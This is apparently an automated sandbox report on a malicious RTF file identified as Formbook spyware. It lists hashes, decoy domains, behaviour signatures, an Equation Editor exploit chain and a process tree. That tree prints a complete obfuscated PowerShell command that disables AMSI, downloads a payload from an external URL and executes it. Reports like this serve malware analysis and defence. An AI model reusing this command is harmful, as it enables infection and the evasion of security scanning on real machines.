Overview

overview

10

Static

static

RFQ_2082983.rtf

windows7_x64

10

RFQ_2082983.rtf

windows10_x64

1

Analysis

  • max time kernel
    151s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 07:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ_2082983.rtf

  • Size

    2.2MB

  • MD5

    5626f64c57491d2f2d614c47da4b9063

  • SHA1

    1a248103d388028fce134bb9cf3f8051b56f6b50

  • SHA256

    153faf944590ffc174faee0c67b6f4a47f186d016881ce3441542f7a36ab8b82

  • SHA512

    653c0c288940672b983504b7f522feae7af471325d0a398d7444d4ce1c66343d113e8a1e9bf51246e3a4e69a166707c7aa8bd2fb7e16e8274c782fe0be23987c

Score
10/10
formbookdt23ratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

dt23

Decoy

acresyetthrow.xyz

botoxforchronicmigraine.com

bulletproofrzr.com

curiaegroup.com

7seasvisas.com

dofastig.com

xu6gfskoedlj.xyz

indoorindia.com

cinejunky.xyz

projectsunshine.info

wefmans.com

gv3f9asm.xyz

couriergbblogistics.com

tcd-ussf.com

ssmgk.com

beeyou-photography.com

agulhanopalheirobrecho.xyz

damlacreative.xyz

businessinvestmentcanada.today

makingwavesbyterra.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ_2082983.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1688
      • C:\Windows\SysWOW64\control.exe
        "C:\Windows\SysWOW64\control.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1540
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:2016
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:672
        • C:\Windows\SysWOW64\CmD.exe
          CmD.exe /C cscript %tmp%\Client.vbs A C
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\SysWOW64\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
            3⤵
              PID:904
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$88599686864747748383993984=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,56,48,98,102,53,52,101,50,53,102,48,53,56,99,101,99,54,49,51,54,50,55,55,100,52,50,102,100,56,54,53,51,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($88599686864747748383993984)|I`E`X
          1⤵
          • Process spawned unexpected child process
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1900
          • C:\WINDOWS\syswow64\calc.exe
            "{Path}"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1480

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Exploitation for Client Execution

        1
        T1203

        Persistence

        Privilege Escalation

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Discovery

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client.vbs
          MD5

          4ad0ded9fbe4dc4c75e9af8f48274dc7

          SHA1

          e5cbe8b8fe9fa5d7ace2fa7927041a4ae76e3689

          SHA256

          3b9826a055e76a1f7ba6339e0f483cc887e1e2a792f39ba0dab041367f5b5b16

          SHA512

          272ea2f7bae603b092d7d4065caf600f8d4b872564fc7c84e53e27f1c30281fc4b9550428b4bfe8fc8a6914a438da52128cebe4de6c649e413b6bf71e0ce7480

          Download Submit
        • memory/1404-80-0x0000000006C20000-0x0000000006D93000-memory.dmp
          Filesize

          1.4MB

          Download
        • memory/1404-87-0x0000000007770000-0x00000000078FB000-memory.dmp
          Filesize

          1.5MB

          Download
        • memory/1480-74-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

          Download
        • memory/1480-75-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

          Download
        • memory/1480-76-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

          Download
        • memory/1480-78-0x0000000000AE0000-0x0000000000DE3000-memory.dmp
          Filesize

          3.0MB

          Download
        • memory/1480-79-0x0000000000180000-0x0000000000195000-memory.dmp
          Filesize

          84KB

          Download
        • memory/1540-82-0x0000000000460000-0x000000000047F000-memory.dmp
          Filesize

          124KB

          Download
        • memory/1540-83-0x00000000000C0000-0x00000000000EF000-memory.dmp
          Filesize

          188KB

          Download
        • memory/1540-86-0x0000000001E90000-0x0000000001F24000-memory.dmp
          Filesize

          592KB

          Download
        • memory/1540-84-0x0000000001F90000-0x0000000002293000-memory.dmp
          Filesize

          3.0MB

          Download
        • memory/1608-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1608-55-0x00000000720A1000-0x00000000720A4000-memory.dmp
          Filesize

          12KB

          Download
        • memory/1608-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1608-56-0x000000006FB21000-0x000000006FB23000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1608-58-0x0000000075AB1000-0x0000000075AB3000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1900-65-0x0000000002872000-0x0000000002874000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1900-73-0x00000000028A4000-0x00000000028A5000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1900-71-0x000000000289E000-0x000000000289F000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1900-72-0x000000000289F000-0x00000000028A0000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1900-70-0x00000000028A1000-0x00000000028A2000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1900-69-0x00000000028A2000-0x00000000028A4000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1900-68-0x000000000287B000-0x000000000289A000-memory.dmp
          Filesize

          124KB

          Download
        • memory/1900-67-0x000000001B720000-0x000000001BA1F000-memory.dmp
          Filesize

          3.0MB

          Download
        • memory/1900-63-0x000007FEF26B0000-0x000007FEF320D000-memory.dmp
          Filesize

          11.4MB

          Download
        • memory/1900-66-0x0000000002874000-0x0000000002877000-memory.dmp
          Filesize

          12KB

          Download
        • memory/1900-64-0x0000000002870000-0x0000000002872000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1900-62-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp
          Filesize

          8KB

          Download